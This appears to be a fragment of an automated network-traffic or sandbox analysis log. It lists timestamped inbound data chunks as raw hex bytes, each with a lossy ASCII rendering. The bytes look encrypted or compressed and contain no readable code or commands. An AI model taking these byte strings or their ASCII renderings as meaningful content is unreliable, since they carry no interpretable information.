              2022-01-14 10:25:30 UTC8INData Raw: a2 22 5d 49 f3 ff ea ad 47 b1 bd 60 d4 c0 b4 db ef bf dc 78 87 f3 f7 e6 aa bb d1 f5 56 6e a2 2b a3 bc 1f 8c 28 22 ee 39 8f d2 d5 40 7f 99 bf 06 22 fc 7f e9 11 ff 0c cf 83 88 fb 21 c5 6b 3f 9d e3 ff 64 fe c8 65 25 d7 25 db b7 ef 61 c6 73 ac 01 1e 5b 5c 48 9c 52 2d 1c 9b d2 d6 a4 3c 8c 3b c4 df bd be 9f a5 bd 63 3b d1 0e e7 83 75 66 a7 bc f9 fa 8c 95 96 d8 7a fa 6f 32 3c 19 85 8c 9b 54 13 8c 70 96 45 b3 3c ab dc 1c d9 45 67 2c 38 4b 44 26 de 00 28 45 70 8d c1 4f f1 99 15 72 51 1d ce d1 40 87 65 be 93 70 56 0e 61 5a d0 71 39 ab ac bc 46 26 55 50 ff af 1d 50 b4 d6 79 d8 a5 bc e3 c7 94 d0 bd aa a0 b1 9f b9 7c 8b 9a 29 43 19 52 68 a4 26 4b 28 13 c6 7e 16 d6 39 85 f0 89 e9 13 f2 78 51 a6 ec 8e 4a fd 33 a4 2c 9f 2f 62 08 8e 4a e0 f3 80 0f 4f c4 23 7f e6 8f c7 25
              Data Ascii: "]IG`xVn+("9@"!k?de%%as[\HR-<;c;ufzo2<TpE<Eg,8KD&(EpOrQ@epVaZq9F&UPPy|)CRh&K(~9xQJ3,/bJO#%
              2022-01-14 10:25:30 UTC9INData Raw: 1f ca cd 47 6a b1 77 ef 4b d6 0f 8e 43 91 da 17 79 ab cc 70 26 29 b4 17 f6 07 9a e9 fe f1 c0 90 41 90 5b 97 c1 7b 2c 99 08 e3 37 95 c7 8b dc 81 07 9f 00 e4 8a 66 a1 51 27 9e 3b 06 3b e9 00 82 70 1c 31 d0 77 8a d0 aa 11 e2 ab a8 e8 25 3c cc 66 38 0a 93 c4 c9 fd 41 d1 96 86 ec 9e 26 59 9b 29 53 09 aa da 3a 16 7a 98 f5 19 18 03 bc 3e 8a 7a 80 6e 5a 96 13 d1 da 07 98 47 72 90 ea 5d f3 2c ac d1 9b db 3d 9c 92 f4 e3 7d a7 14 a7 b8 1d c9 c3 25 92 6f 81 4c 2e 24 59 52 cb eb bb 88 b5 4c 5b 5e d0 c9 4f 7e 9b c1 c0 26 f6 6d 2c 24 44 16 74 82 d7 8c a1 ac 01 07 7d 64 cb 3d 32 98 20 5d 5a d0 36 6c f9 67 9b 70 f8 60 c1 61 10 a7 2f f4 ea 5c 96 46 e9 02 80 20 14 ff 4e 52 ae 01 0b e1 0c e2 36 7f 6c 1d 9d b5 89 fa 80 c4 55 29 15 2b fb fe 7c 95 88 cf 92 ab 0a 4a a9 b1 98 51
              Data Ascii: GjwKCyp&)A[{,7fQ';;p1w%<f8A&Y)S:z>znZGr],=}%oL.$YRL[^O~&m,$Dt}d=2 ]Z6lgp`a/\F NR6lU)+|JQ
              2022-01-14 10:25:30 UTC10INData Raw: b3 32 ae 07 15 e7 06 7c d1 08 59 e5 90 44 16 6f 5c a0 6b 80 ef c1 bd 7c 8f d6 ad 6f fb 57 f3 3a c4 f4 7b 0f 4f 69 04 7b ab 24 c2 fc 65 33 39 98 89 d9 ac ac d3 4c fc 76 53 c7 7a 37 30 e7 ac 16 75 06 15 1b a8 cb f1 c1 d5 4f 6a b7 81 a7 79 4e 7c 42 b2 0a 89 e2 f3 df 3a 0f 54 14 ad 85 e0 be fd 8b 91 99 1a 95 b5 90 4a e1 aa 11 14 1f 70 2c 52 e8 8d d7 c9 52 7d 38 b2 c3 2d ba ea 80 44 b6 bd 91 44 b2 41 9d a0 3c c0 05 3f d0 63 8f 88 61 5f 51 c6 52 ec 29 16 a4 64 a9 b7 92 a1 56 39 8b 43 31 e2 bb 6b 26 c1 2f dd 1c fd 5e 9c 31 b5 94 69 36 04 40 9e f8 3d 8e 4a f6 ca b2 8e ac b5 4a a0 25 ce c5 62 d4 7e 50 71 aa ce dd 2e 25 f2 17 28 2e a1 02 4f 7d 16 6f 20 56 cd 41 1d 61 f1 0a 91 de 66 09 b9 08 59 e0 1e 42 17 f3 3b 93 51 b0 cd 9c c3 7d 1f c9 cb 05 68 cb f8 b7 6b 2d a9
              Data Ascii: 2|YDo\k|oW:{Oi{$e39LvSz70uOjyN|B:TJp,RR}8-DDA<?ca_QR)dV9C1k&/^1i6@=JJ%b~Pq.%(.O}o VAafYB;Q}hk-
              2022-01-14 10:25:30 UTC12INData Raw: f2 d0 02 26 57 41 9d 71 79 5d fd 4c 5a a7 b3 9f ad 88 7f b7 68 16 af e3 2c 25 d0 91 55 a9 b6 db 85 b0 08 86 70 c2 b4 cc c6 75 94 15 f6 64 a9 7a 45 1f c2 73 d5 1f df 3f 9a 1c 33 fe fa c0 5f 12 7d 18 7d 6e 94 7a 7b ae a7 f7 e8 97 c9 d1 28 41 81 51 af d9 26 54 d6 d6 01 26 10 d1 f6 2a 22 56 c2 0c 3c 31 4e 4d a7 e5 0c 70 8e 92 37 63 b9 ec 4a 7c 88 7c 96 b0 60 d7 6f b3 3b 42 0f ef 16 90 e8 e1 2b 20 e4 50 f6 6a bc fd 66 69 01 b3 48 3d 80 73 11 70 a4 73 b9 d4 7b fe 76 8f d5 45 43 f9 cf 92 e3 cd 4e fc 61 f7 6a 1b 02 00 50 1b d7 31 a6 6b 08 ae eb ab 5a 23 d9 37 96 fc 2a 2e 56 75 ad 6e b0 1e 5e 1e 6f 54 a9 3a a1 5e cd 42 1a c7 d1 dc f7 5a 1a a4 22 5e d5 41 b5 81 87 4b b2 f0 89 ea 8b be 59 44 56 4e 2c ae 13 e5 16 03 47 c3 5b ec 44 90 46 ed 12 c6 d3 f2 a9 7e 4b eb 1a
              Data Ascii: &WAqy]LZh,%UpudzEs?3_}}nz{(AQ&T&*"V<1NMp7cJ||`o;B+ PjfiH=sps{vECNajP1kZ#7*.Vun^oT:^BZ"^AKYDVN,G[DF~K
              2022-01-14 10:25:30 UTC13INData Raw: e2 ba e6 9b d7 92 fc 0f 3e 22 53 75 03 16 00 9a fd 3e 7f e3 2d b5 82 83 af f5 9c fd 87 f0 83 ec 79 4a 9a 96 66 4d 2f d0 2e e4 f5 82 ef f6 1b c4 91 d4 c3 fa 50 86 93 f6 e4 94 3a d9 0c 76 8f c6 fa 9a 8b 03 04 30 15 ee 85 eb 06 5a f1 fe 53 cd 44 76 27 e6 85 e7 0e 64 57 2d 5e d6 73 2d b5 9e 21 d0 61 79 6a 23 ec 6c 92 c1 68 c4 26 60 cd 53 74 90 23 52 84 88 70 16 41 7a a0 fb ca cd 44 1c 5f bf 04 6b 3d 26 7d 06 9f a3 be 21 f6 a7 13 fa 89 8d 5a e2 47 cf 3c f3 40 11 2c 12 90 2d c5 9e 5b 26 d3 76 7d b4 de 40 7f 77 d4 ce d8 da 70 61 5d 53 64 57 63 94 41 e2 6b 1b dc a0 2c 2d 5e 05 f6 76 71 22 e2 b4 78 35 9a 57 58 cd 5f b8 47 8d de 19 d1 54 c7 57 5a 65 0f e6 94 5d 48 6a 93 ad 13 c0 1b f9 5a dd 58 18 5c da b5 9c 26 bc b2 f8 73 d2 f7 ee 94 42 10 1f 4e 9d 5f 4f aa 22 4a
              Data Ascii: >"Su>-yJfM/.P:v0ZSDv'dW-^s-!ayj#lh&`St#RpAzD_k=&}!ZG<@,-[&v}@wpa]SdWcAk,-^vq"x5WX_GTWZe]HjZX\&sBN_O"J
              2022-01-14 10:25:30 UTC14INData Raw: 51 69 31 49 a1 19 e2 31 03 74 47 43 67 e7 05 aa 1f ad 2d 82 6b 38 1c 45 f6 2e 9d b6 c0 44 6c 23 80 7f e1 e1 46 14 2d b8 7a 45 9a 53 73 17 13 fc c5 63 4c 51 45 6a b4 0c 7a 62 71 be f0 36 00 83 e5 1d da 24 6f 45 83 c3 c0 eb 70 57 72 9a 5d 54 c4 1e 13 1d d7 f3 c5 66 ab 81 ef 89 f1 ec c7 51 c7 41 f0 46 c1 65 22 4e f5 19 a2 c5 75 a2 0f f8 7a 90 45 a9 ac fd b7 8d 6b 1c 56 cf 52 ec eb ac 52 0a 87 62 af 15 5c 23 e3 b9 55 31 14 5a ca d7 3c 09 90 c2 8a a8 0b f1 1b c1 6d 45 49 9b 0f 92 a0 4a 1a 18 71 b3 9c 5f 81 dc a2 3c 12 75 ed 4f 8d c1 d3 73 04 88 7c 8a 9a 5a 47 73 73 d5 68 a0 2b bb 7d e8 1c c2 f2 c4 c0 ef 06 99 da 22 70 e4 4e fa 8b a0 39 34 32 4a 49 44 17 f4 6a b4 f5 a9 5c ce 7e b8 07 06 97 d6 61 4d 93 e8 50 d3 57 41 98 5b 24 d1 02 7a 95 4a e1 ae c4 f8 96 78 22
              Data Ascii: Qi1I1tGCg-k8E.Dl#F-zESscLQEjzbq6$oEpWr]TfQAFe"NuzEkVRRb\#U1Z<mEIJq_<uOs|ZGssh+}"pN942JIDj\~aMPWA[$zJx"
              2022-01-14 10:25:30 UTC16INData Raw: df 76 1a 41 d7 21 2b f0 14 79 c1 f4 61 8f c2 82 3e e0 79 38 d7 5f 54 97 70 74 87 61 bb 1c 84 b8 6b 6b f0 50 a7 7b 18 3a 92 c9 49 72 99 d9 c7 b9 fd e7 04 9f b0 d8 7e 82 1f 8b f8 a0 75 08 9c 74 fc dc 0a 22 16 7f 62 ac 61 59 31 51 00 88 77 04 8c 9c 29 3d 26 f6 07 1f 8c ca 3d d8 c4 69 8a 81 41 a3 4e 51 49 95 05 3c e4 26 7f 06 4e c4 ba 88 92 95 7a 79 14 71 60 38 da 97 af 39 29 9c 38 02 83 af 86 69 ce 50 64 53 70 9e 60 3d e7 3f db 53 15 f2 9d fc 74 8c 83 4f 1d 32 c8 65 52 e4 9e d1 a4 eb 62 a1 a8 54 aa 08 26 1f c2 f6 9e 2d 7a 26 27 03 09 6d ed f8 64 a5 aa dd 39 fb 82 b1 3f 87 fb f6 33 41 17 90 b9 b2 ce ac 14 6d 5b 36 3d d4 8d c2 f0 78 7b cc bb 69 21 31 17 d9 4a 94 2b b6 58 85 e9 15 1c 9e 8f b9 7e 9b 0a 10 04 46 2d f0 43 44 b8 6d 99 0d ef 1a 44 71 88 d2 c4 02 1f
              Data Ascii: vA!+ya>y8_TptakkP{:Ir~ut"baY1Qw)=&=iANQI<&Nzyq`89)8iPdSp`=?StO2eRbT&-z&'md9?3Am[6=x{i!1J+X~F-CDmDq
              2022-01-14 10:25:30 UTC17INData Raw: e3 5b 43 e7 48 f9 e0 b9 ea e6 78 43 d7 26 43 9a 24 41 3f 41 80 60 24 ff d9 5b a1 08 97 2c c9 b1 4c f6 6c a1 9f e6 9e 22 38 fa 14 46 92 2b ba fd ad 97 cf 33 a7 31 f9 e1 38 fc db e6 79 b4 19 ee eb 45 1f 35 60 a3 43 4a e7 4b 07 fb 2d c5 1b be f0 9b 91 cf 56 97 d4 2c fe 81 8a 17 e9 32 6c bc f8 9b b8 7e 48 6f 92 04 94 2f 40 8a 97 bc f0 9d c1 71 bc b9 71 1a e8 34 58 11 50 2a 58 d1 5c cc 92 22 1d c5 80 95 5d 40 15 f4 08 f0 2a ff 9c 2a 38 16 7f f8 89 bf 68 a3 1f 7e e5 41 99 20 3a e3 57 2b a7 6e ee 98 53 2e 66 46 4f 1d da a3 ac 4b 60 b6 af 56 c8 b3 04 0d 2a ab 58 c5 6c 02 2a 29 d9 ef d6 6d 8d 17 f3 fc f1 ca c0 e7 0c 71 7f e4 c3 72 0f 31 ba ee 88 74 ce de e8 8f 4a 43 96 42 09 10 35 a3 e7 07 91 67 32 36 39 80 25 d3 85 ed a8 e9 7d 0d ed 10 38 03 46 e5 b5 4f 0e 7a 83
              Data Ascii: [CHxC&C$A?A`$[,Ll"8F+318yE5`CJK-V,2l~Ho/@qq4XP*X\"]@**8h~A :W+nS.fFOK`V*Xl*)mqr1tJCB5g269%}8FOz
              2022-01-14 10:25:30 UTC18INData Raw: 80 6b c3 76 8a 20 2f f1 1a 12 6c d3 4d eb d9 2a 37 64 08 00 f4 76 88 1a 2d b1 8d 65 36 27 9c 39 d4 b3 6a 5c 4a 90 5a d4 b0 71 07 71 06 88 6b 98 ee 18 c2 f0 87 ef 1c 18 26 db 73 f1 d3 72 a7 04 fc c2 c9 3b 63 35 14 74 2c 33 a7 bb 01 e1 64 cf 89 e8 ff 24 b4 16 7b 12 be eb 0e 60 d7 25 a2 f8 95 d2 da af d0 c1 63 21 db ce 7c 19 f9 f8 78 d4 c1 00 3d 5e 62 b5 96 5a d4 c0 ce 8f dc b1 65 f5 96 2a 44 f9 1f 7e 9d b2 00 f7 fd 50 a7 b2 1b 94 e2 4f d0 68 e3 3e 62 14 d7 26 12 37 c8 83 59 94 4a eb a1 03 bc f8 7c 5a 9c 23 d8 43 3c b0 5d 58 b9 70 4a b0 0b ef f2 29 dc 56 ae b7 e5 a9 0e 01 6e a0 98 2d af 8e 1b e9 c9 66 dc e2 a6 64 aa 63 41 98 98 49 62 ae aa 88 af 20 8e 1f be ae 18 26 5b 03 1f 31 4b d3 49 62 a9 c7 ba 86 62 c0 b6 11 e1 07 80 d9 72 73 29 ec 2f a9 ce 3c 25 b4 94
              Data Ascii: kv /lM*7dv-e6'9j\JZqqk&sr;c5t,3d${`%c!|x=^bZe*D~POh>b&7YJ|Z#C<]XpJ)Vn-fdcAIb &[1KIbbrs)/<%
              2022-01-14 10:25:30 UTC20INData Raw: 69 c2 2b a4 31 b9 72 5f e9 0c 0a 8d ba a5 ac 0b a8 31 51 1e 5b 29 56 63 36 35 a0 22 3d 87 45 3a 0d ea c2 ee c6 95 25 24 48 f4 79 1f ab f5 18 82 ac 7b 1e 50 18 cd da d4 c5 61 5e c8 dc be f1 b3 1e 8e ec 24 1b 55 a9 4c cd 54 cd 43 f9 0d 36 24 41 90 4d 09 7e 8b f1 45 6d 33 49 92 6f 30 22 5e 0b 6c ce 59 9c b3 f4 67 21 c9 47 74 90 1f 9f 61 d6 fd 12 52 b8 a7 f6 f2 a0 67 d1 68 fa fa 84 52 57 d0 4a 1d 4d f2 5e 99 15 d8 c5 98 5c bd 10 82 26 25 92 1e 4c b6 7c 60 6b a4 48 e0 aa 57 25 c5 d3 48 e4 8f 84 76 c4 9b 99 a7 bc 23 d7 21 df c5 20 2a f3 61 26 81 d6 fe b3 6c 62 d0 01 81 bb aa 50 e4 c9 3c 49 10 8d 2d 38 67 28 3c e9 d8 3b f4 7f e3 24 37 81 eb 16 3d 81 a8 5c 99 b7 9c fd ec 8a 67 fe c9 35 c1 0e 70 c6 90 44 17 2e 9b ad d6 f4 e1 3d 84 6d 3e 4b 36 8d ff 9f 41 9e 84 72
              Data Ascii: i+1r_1Q[)Vc65"=E:%$Hy{Pa^$ULTC6$AM~Em3Io0"^lYg!GtaRghRWJM^\&%L|`kHW%Hv#! *a&lbP<I-8g(<;$7=\g5pD.=m>K6Ar
              2022-01-14 10:25:30 UTC21INData Raw: c7 8d a0 39 89 06 49 19 2e 9b 79 7d fb 04 8a 6c a2 3c 69 3a 04 fb f9 ed f1 ce 05 03 0c 75 1d 67 9a 49 09 02 89 b5 96 4f 21 7c 75 eb 02 9d af 8b a8 38 7a 92 04 f2 64 be 63 92 2e c0 0a 30 33 b8 16 03 e5 a3 66 ba ef 0e 80 bb c2 ea 99 cf a4 ee 38 08 9f a7 47 c5 75 0c 73 0f 83 a0 2d e6 83 a1 af c5 6e ea 9f e1 30 d1 b5 8d c0 e6 90 2a c4 1d c0 f9 e3 28 42 50 e2 de 0f 31 67 3d 8e 40 19 e6 86 6a 03 d1 51 6b 27 cd e0 bc eb 1a 50 3d 23 da a8 e4 30 9a 10 91 ea da 16 39 be ff bd 09 38 0a 21 bd 9a 51 a2 2a 1b c2 f8 75 6c 49 2c 5c 9a 80 4f 1a 95 19 ee 98 5e 27 1f bb c9 50 81 3a 60 de ad 95 9d 78 7c 49 ab 96 5e d1 07 0f 87 40 c4 32 26 4b 6a bd 63 06 e9 12 6f f6 56 86 6f 2d ac 1c 35 40 e2 2a 34 30 3a 70 d0 29 45 fc 74 8d cc de 35 d4 d9 24 16 e7 f7 3e a6 3f 81 eb 5f 5a ad
              Data Ascii: 9I.y}l<i:ugIO!|u8zdc.03f8Gus-n0*(BP1g=@jQk'P=#098!Q*ulI,\O^'P:`x|I^@2&KjcoVo-5@*40:p)Et5$>?_Z
              2022-01-14 10:25:30 UTC22INData Raw: 38 e6 77 44 09 1d c7 26 31 a7 00 59 55 4a 3a b0 a9 f6 6d df 5a 77 65 dd 99 94 4b 71 02 eb 0c 69 55 5e c2 b9 6b cb e9 ee e7 fe 8a 20 42 04 86 16 66 a0 53 71 00 70 2e 79 07 13 f2 10 11 eb 89 e6 92 43 de a2 c3 ab bb 15 0b 17 b5 8c 75 03 76 92 7b 63 20 42 ed c3 33 b8 1b c9 28 4d 7a 9c 31 a2 24 b7 61 13 f9 e3 3c 5c dd 23 cd 48 86 72 1b 1a 51 63 73 0d 06 69 79 0e 6e af e2 c4 fe 4d fa 7c 9b 29 0f b9 65 25 db f2 d0 0d 9d b1 09 b6 1d c9 e1 b3 96 8b ed 63 62 ce 89 63 08 f4 93 77 d2 b9 69 31 b0 ea ea 80 1e ad 2e 62 b8 15 f7 81 b0 ec eb 18 26 34 22 4a 0b 1e 13 f8 63 30 4b 06 96 ac 16 65 35 70 ad e7 f5 48 aa 13 e1 30 52 05 f5 ad 8e 49 76 e1 6b c2 8c 60 78 e2 b7 84 8d 31 e5 16 75 04 e3 41 9a 8c 67 2a 29 79 a7 7c c0 0d 39 d1 5b 55 4a a5 bf 6a b2 11 89 fd e8 25 d9 22 b6
              Data Ascii: 8wD&1YUJ:mZweKqiU^k BfSqp.yCuv{c B3(Mz1$a<\#HrQcsiynM|)e%cbcwi1.b&4"Jc0Ke5pH0RIvk`x1uAg*)y|9[UJj%"
              2022-01-14 10:25:30 UTC24INData Raw: 26 6b 64 1d 18 db 07 03 fc 32 da 4a 79 8d 60 a7 44 10 be fe 09 1b db 2b d3 b8 48 87 3f 1f 60 78 94 33 a5 ae 79 8b 45 63 31 a9 c7 07 5d 5f 40 11 f1 60 24 ab 8d d6 af 86 16 3f 64 71 04 93 c4 ed 1e f5 46 fe 7e 7c c2 8b 06 18 b9 81 ea 87 a2 35 cf 88 77 05 11 55 3b 71 fc 7f eb 19 f6 30 52 e0 d1 8b eb 12 98 f4 72 94 4b 79 6f 2b a4 98 59 48 5e 9c 20 4f 6c 4f c4 e4 64 bb 68 fb a8 dc 50 26 51 7d 1c 57 4d 58 1d cd 4d a8 80 fd f9 52 9e dc 5c db 32 38 0d b6 76 8c f5 3e 12 73 f2 b5 39 84 6a ad 81 49 d0 d3 37 81 25 7b 02 85 04 6a b1 ff fb fc d2 63 59 02 82 9d 45 72 8e 47 69 51 6a 92 04 95 89 9a fc f8 74 74 92 53 17 9c 3c aa 3d 97 dd ec 16 15 ff cb 22 d4 8a 67 15 b9 3a ea ba ba 54 9c 37 86 c1 55 4b 0a d9 e6 3d d5 4d 07 ef 74 76 9d 7f ed 75 0e 7e 9a 27 24 15 8e 93 7f f8
              Data Ascii: &kd2Jy`D+H?`x3yEc1]_@`$?dqF~|5wU;q0RrKyo+YH^ OlOdhP&Q}WMXMR\28v>s9jI7%{jcYErGiQjttS<="g:T7UK=Mtvu~'$
              2022-01-14 10:25:30 UTC25INData Raw: e7 b5 92 4d 7d c4 47 6a fc cf 30 44 d9 31 3f 7b 5a 03 3d 69 cd 65 53 83 f9 4d 61 b8 19 f1 1a a1 73 7d ed b1 eb 6a 73 29 c0 a8 35 ad 9e 20 b5 07 5c d1 5b 5b 9a 72 f8 07 e1 75 26 bb c2 c9 cb ed f9 96 44 19 e6 6d 67 a5 4a aa 83 14 31 3e ec d6 27 2b f3 58 90 b5 66 fd f9 ea 91 dc 3c d5 5b 4c 0a dc d7 da 78 b4 76 61 20 ac 65 74 90 41 89 ef ff 53 1c 2e 4a e2 f7 90 4d 6d a6 84 09 c2 45 14 95 c3 78 9c 2f 46 37 7e fc 7c 87 b9 2f a6 78 fb c9 2c 53 19 04 57 25 85 6a 1e 74 d2 c1 26 5f e2 23 e7 cb 5b 0e 7d 95 71 3c 44 10 20 4c 7e 3c 3c 57 41 d6 bb ef b1 a4 71 03 cc d0 63 83 ef 4c e2 2f ae 8e ea 9d ed 10 77 13 ef 10 40 0e 65 f5 26 38 a1 18 36 36 c2 50 97 b8 64 b6 2f e3 ec 6d cc 8e 55 51 7b 75 61 45 e1 9b dd 3b 76 79 5b 5a cb 47 00 1b 76 70 e5 16 09 66 41 c4 4f 90 9d 2f
              Data Ascii: M}Gj0D1?{Z=ieSMas}js)5 \[[ru&DmgJ1>'+Xf<[Lxva etAS.JMmEx/F7~|/x,SW%jt&_#[}q<D L~<<WAqcL/w@e&866Pd/mUQ{uaE;vy[ZGvpfAO/
              2022-01-14 10:25:30 UTC26INData Raw: 62 a2 27 c9 49 0e 08 6a 45 6a ae 18 68 ab 19 20 4a e5 41 99 c3 71 12 8a 8d cd 5a dd 3d fb 90 bf 9e 2a 27 ca d5 44 7f 33 a6 28 3b 29 68 ab 9e 58 ab 9b 82 ac 06 97 29 d3 cb 2c da 76 9f bd 77 0a e6 81 96 8f db 2f 4d 9f a4 24 57 4e 9f b3 30 9d a1 a6 57 bc 03 1c 40 1b cb b6 b8 13 92 b3 3c 1e 55 49 6c c8 c5 e1 95 cb 53 8a 3b e0 6c 07 84 88 89 fe 6f 37 84 0c 30 a4 59 58 5b 61 5d 4c 27 60 ab fd fd 53 58 ce d3 81 59 29 7a 2b e0 24 aa 46 8d 8a 0b 5c 7f 90 58 c5 7e 83 fb 99 94 44 15 52 45 7a f9 3c b6 ed 13 f7 f0 f5 ef 6e a4 21 d6 7f 62 d2 80 3b 7f c3 32 be 16 87 f8 60 cd 53 18 33 20 2d a2 11 c0 f7 f1 b1 2a 5f 3e 11 3f a2 25 d5 fc fe 1c ed d4 80 17 08 ce bc a4 5e 5d f0 f1 19 e0 bc ef 1a 9d ee 8c 7c 8d 4e 0a 47 67 29 a8 3f f8 36 f8 08 98 d8 93 cc cf 86 c6 8b 83 f0 f1
              Data Ascii: b'IjEjh JAqZ=*'D3(;)hX),vw/M$WN0W@<UIlS;lo70YX[a]L'`SXY)z+$F\X~DREz<n!b;2`S3 -*_>?%^]|NGg)?6
              2022-01-14 10:25:30 UTC28INData Raw: 0e 01 09 37 5f c0 85 25 df f2 d8 c8 63 da c4 3f 00 8b 01 3a fb c0 2b 51 0c 9a 72 5c 59 9e 82 d2 e8 c2 0b 36 4b 7f b3 28 97 1d d9 5b 6b b2 15 ae 1e e4 71 7d 25 96 b1 a8 89 42 3d df ec 62 28 79 78 54 21 c2 68 a4 3b d3 84 41 36 80 2b 86 b0 b4 cf f4 02 4f aa aa ac a9 6a ce db 1b 27 e4 36 ce d5 f7 e4 a3 45 a3 fc e3 cb 97 dc c7 2b 4a 70 f0 df 99 1e fa 2e c3 fe 18 11 0c 50 61 0e ca 71 29 0b 57 0f bd 25 d5 dc c7 8d 21 90 b8 ab 05 f7 fc 88 99 9d a9 4d 77 7e 83 5b b9 8e 7d a2 95 60 63 99 e2 65 33 2f d2 c4 da 80 3b 17 18 ce 16 6e 8d e1 d0 df 3e ff 47 43 5f 82 86 0b 8b 16 cc 25 07 09 b9 13 d9 56 bf f8 55 e7 54 21 c8 83 86 59 bc 46 08 d7 0f 82 d6 4f 2a 3b dd a2 fc 20 8d 3d c6 82 8e 32 f7 d2 67 19 cb be fa 94 56 0b b2 c2 47 11 d8 30 bc 60 5c 07 3a bf 21 a7 e1 9c 95 93
              Data Ascii: 7_%c?:+Qr\Y6K([kq}%B=b(yxT!h;A6+Oj'6E+Jp.Paq)W%!Mw~[}`ce3/;n>GC_%VUT!YFO*; =2gVG0`\:!
              2022-01-14 10:25:30 UTC29INData Raw: 42 03 0d ae 07 6c ad 85 9d f6 72 c1 c3 63 26 52 f6 6a 53 dc c3 77 64 6c af 96 85 6d fe 82 7d b3 2a 78 25 89 36 b3 d5 1e 8a a2 a9 71 9e c2 87 bb 63 8f c6 fc 8f 69 42 7e f6 05 4d 72 2d c8 db 31 6c 3c 66 fb 45 76 95 c8 cc c2 6f 8f 92 15 36 ce d7 d6 01 70 72 21 aa 56 39 58 cd f2 73 1c 57 4a be ac 89 10 0b 80 88 b0 0b 8c 34 58 32 33 6a af e4 e3 cf 16 1d 05 2f f4 f2 7b 1b d9 4a 50 55 46 a2 32 5c d7 97 79 0d 71 00 c2 f7 59 ee 83 bd 6b 65 2d 13 2c 3e 50 fb b1 99 8d 3d e3 39 8e a2 e7 08 9a ab 5f 21 47 47 d8 b1 01 0f fb f4 92 e5 08 64 c0 5f a4 4f 15 08 41 e7 fd 5c b1 6f 59 59 b3 e2 d1 a8 5b 8f 25 b2 78 6f 44 cd af e7 64 4d d3 25 3e 70 54 17 46 8a a2 18 21 17 85 6a 18 b4 aa 01 13 f5 e2 fe 83 ee ca 6d 82 2e 24 a9 bb 34 48 17 9c b8 79 11 9e b6 1a 42 c5 f0 e5 23 d2 4a
              Data Ascii: Blrc&RjSwdlm}*x%6qciB~Mr-1l<fEvo6pr!V9XsWJ4X23j/{JPUF2\yqYke-,>P=9_!GGd_OA\oYY[%xoDdM%>pTF!jm.$4HyB#J
              2022-01-14 10:25:30 UTC31INData Raw: 59 28 90 4c e0 b1 88 63 c6 6b 2c 2a f2 ee e2 56 31 a7 a9 b9 6e c9 12 71 20 32 30 29 08 2b d5 88 5d 0d 67 d3 ab db 27 c0 e7 f9 4c 9a be 1e 9a 57 5f 48 06 ff 87 19 14 5a d2 d9 30 c8 63 2a 37 86 69 40 ec e8 74 54 b6 e1 cf 21 d6 b8 1d a0 bd 50 97 d9 43 9b d3 51 0a cb fc 6c da b7 9c 25 23 28 45 7a 94 5e 39 7e fc 6f 24 54 2a c3 00 81 fa 78 68 41 5e c0 fb ec 77 f1 de bd 6b 3e 10 73 72 88 7b 86 4c 5d dd 4f 93 68 85 ed 04 8e ef a2 4f 8c 1e 4c fe 72 6d 50 22 a9 11 ce d1 58 c1 08 62 4d 04 89 ea 88 9e de dd 39 84 74 77 e1 4e fe 62 b8 fb 0e f5 e4 80 7f 03 ff 67 32 35 af 6d 9a 32 51 3f e1 ec 1e d4 da ab 87 8a 23 2e df 01 06 93 c3 cf 57 38 16 72 9d 29 71 2a 39 84 6c cd 56 dc a0 3b ae 70 88 75 da 17 8f 34 92 61 57 49 6e 6f 88 0a 65 31 a8 29 bc 11 81 87 16 26 27 74 03 00
              Data Ascii: Y(Lck,*V1nq 20)+]g'LW_HZ0c*7i@tT!PCQl%#(Ez^9~o$T*xhA^wk>sr{L]OhOLrmP"XbM9twNbg25m2Q?#.W8r)q*9lV;pu4aWInoe1)&'t
              2022-01-14 10:25:30 UTC32INData Raw: 8d a5 38 44 04 f1 68 49 b6 ea 90 8a 7b 17 f1 e4 5c 56 b7 e2 ad 6f 59 51 78 7a f1 6c e0 73 f4 82 eb 1f d1 44 62 dd 6a da aa e8 9c 32 3c df 85 4f 8e 68 b1 f5 38 0a fe 32 40 f0 33 43 8c 6d 32 4f 0e 7d 6f 08 8e 57 95 6e ca 10 49 2f d8 51 87 0a 89 fe 7e fc 8c 1e 50 9a 46 5b 55 51 65 f5 5b 37 2d 27 aa ae f2 63 30 2f 4d d0 cb 31 d2 c0 6d 2b a2 23 7e 16 0e 3a 5b b3 54 84 92 65 76 01 96 60 fc db 5c 77 5c 16 2f 7e 3c 6e 46 ff 8a 83 b2 68 c7 a2 77 74 d2 3e d9 50 b6 7c f6 1c 17 fa b8 11 ef 0e b6 ab e9 d1 d6 ed 73 5f 30 5a bb 31 aa 72 87 fb e7 ad 35 c7 97 64 fd 95 b1 f4 8f 60 b1 e8 d4 c3 39 c5 73 04 47 ee fa 39 d2 8a 36 b2 99 e1 33 ad 40 7d 55 e4 4f ef e5 65 de a9 13 ea f5 06 49 15 88 10 3f 62 6f 4c 01 d7 8f ca cd 5e 9e 20 1e 4f b4 17 fe 1b 8b f6 13 e8 00 13 f5 e5 e2
              Data Ascii: 8DhI{\VoYQxzlsDbj2<Oh82@3Cm2O}oWnI/Q~PF[UQe[7-'c0/M1m+#~:[Tev`\w\/~<nFhwt>P|s_0Z1r5d`9sG963@}UOeI?boL^ O
              2022-01-14 10:25:30 UTC33INData Raw: 8e 26 2b e7 ce 6e fb fc 77 06 95 b0 fa 8d c3 64 ac 01 69 60 23 01 02 82 6d 24 55 c3 b3 9f b6 fe 21 a2 7d 76 7e 76 97 db 27 d2 a3 d7 3d 63 e5 09 19 1b 7c 0e 10 67 35 e6 62 59 4e f6 79 06 eb 8b 48 83 b7 6d 93 b7 9d ae 02 92 71 7e 9e 23 0f 50 60 77 b1 d4 7e 6d 66 a9 62 16 68 a5 ad 89 90 53 43 5d 52 e6 5e 5c de 1f 6f 3a 07 07 67 fe ed 1b c4 e1 44 01 30 f3 e0 a6 d8 c7 45 72 e0 cd 0f f4 56 5f 43 93 1f 7c f2 b0 1a b1 3b 9f ca 77 88 14 74 bc 38 14 64 f5 06 80 ae ac d3 d1 56 13 e6 2c 6e 86 69 4e b5 9b 2f 47 66 a1 af 8e 30 58 d3 b7 f5 fb f2 b8 ac 7a d0 cc ae 00 db 48 e4 9b 74 3e 78 3f 19 8a d2 e6 85 ff fa 23 df 5a d3 5b 33 ac 94 85 f6 71 44 13 8c 73 03 76 6c 6a f6 01 0d e5 0b 7b dd 3d 91 87 f5 9f a9 b9 14 82 ba be 8f c7 43 8a 00 1f cf 40 f6 eb d7 58 d8 a3 e7 6b ce
